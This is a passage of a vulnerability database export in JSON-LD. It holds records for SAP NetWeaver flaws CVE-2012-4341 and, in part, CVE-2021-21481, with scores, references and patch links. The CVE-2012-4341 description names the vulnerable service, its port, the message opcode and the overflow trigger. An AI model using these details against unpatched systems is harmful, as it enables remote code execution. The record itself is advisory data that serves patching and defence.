"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539"
}
],
"trust": 2.7
},
"cve": "CVE-2012-4341",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2012-4341",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "ZDI-12-112",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-111",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-104",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-4341",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-112",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-111",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-104",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201208-264",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2012-4341",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-4341"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "78143"
},
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
}
],
"trust": 5.31
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-4341",
"trust": 2.8
},
{
"db": "ZDI",
"id": "ZDI-12-112",
"trust": 2.7
},
{
"db": "ZDI",
"id": "ZDI-12-111",
"trust": 2.7
},
{
"db": "ZDI",
"id": "ZDI-12-104",
"trust": 2.7
},
{
"db": "SECTRACK",
"id": "1027211",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "49744",
"trust": 1.7
},
{
"db": "BID",
"id": "54229",
"trust": 1.2
},
{
"db": "CNVD",
"id": "CNVD-2012-3434",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-3433",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1396",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1394",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1395",
"trust": 0.7
},
{
"db": "BID",
"id": "54231",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539",
"trust": 0.6
},
{
"db": "BID",
"id": "78143",
"trust": 0.4
},
{
"db": "IVD",
"id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2012-4341",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"db": "BID",
"id": "78143"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"id": "VAR-201208-0222",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
],
"trust": 1.87111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
]
},
"last_update_date": "2024-07-23T22:37:43.393000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 1.4,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP NetWeaver",
"trust": 0.8,
"url": "http://www.sap.com/platform/netweaver/businessbenefits/customdevelopment.epx"
},
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18435"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18434"
},
{
"title": "SAP NetWeaver ABAP Fixes for multiple stack-based buffer errors",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=209631"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2012-4341 "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/r3p3r/cve-search "
},
{
"title": "cve-search-src",
"trust": 0.1,
"url": "https://github.com/extremenetworks/cve-search-src "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/zien-tf/z_iot_cve-search-api "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/pgurudatta/cve-search "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/cve-search/cve-search "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/dim0niu/cve-search "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/swastik99/cve-search-master "
},
{
"title": "cve",
"trust": 0.1,
"url": "https://github.com/zwei2008/cve "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/miradam/cve-search "
},
{
"title": "modified_cve-search",
"trust": 0.1,
"url": "https://github.com/hr-cert/modified_cve-search "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/swastik99/cve-search "
},
{
"title": "cve-search-ng",
"trust": 0.1,
"url": "https://github.com/cve-search/cve-search-ng "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"trust": 2.0,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/"
},
{
"trust": 2.0,
"url": "https://service.sap.com/sap/support/notes/1649838"
},
{
"trust": 2.0,
"url": "http://www.securitytracker.com/id?1027211"
},
{
"trust": 2.0,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 2.0,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/"
},
{
"trust": 2.0,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/49744"
},
{
"trust": 1.3,
"url": "https://websmp230.sap-ag.de/sap%28bd1lbizjptawmq==%29/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-4341"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-4341"
},
{
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/186"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/185"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/54229"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2012-4341"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/78143"
},
{
"trust": 0.1,
"url": "https://github.com/cve-search/cve-search"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"db": "BID",
"id": "78143"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"db": "BID",
"id": "78143"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2012-08-15T00:00:00",
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"date": "2012-08-15T00:00:00",
"db": "BID",
"id": "78143"
},
{
"date": "2012-08-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"date": "2012-08-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"date": "2012-06-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201206-539"
},
{
"date": "2012-08-15T21:55:05.353000",
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2022-10-06T00:00:00",
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"date": "2012-08-15T00:00:00",
"db": "BID",
"id": "78143"
},
{
"date": "2012-08-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201206-539"
},
{
"date": "2023-11-07T02:11:50.587000",
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
}
],
"trust": 0.6
}
}
var-202103-0644
Vulnerability from variot
The MigrationService, which is part of SAP NetWeaver versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not perform an authorization check. This might allow an unauthorized attacker to access configuration objects, including such that grant administrative privileges. This could result in complete compromise of system confidentiality, integrity, and availability. SAP NetWeaver Contains an improper authentication vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202103-0644",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-004419"
},
{
"db": "NVD",
"id": "CVE-2021-21481"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21481"
}
]
},
"cve": "CVE-2021-21481",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 8.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2021-21481",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
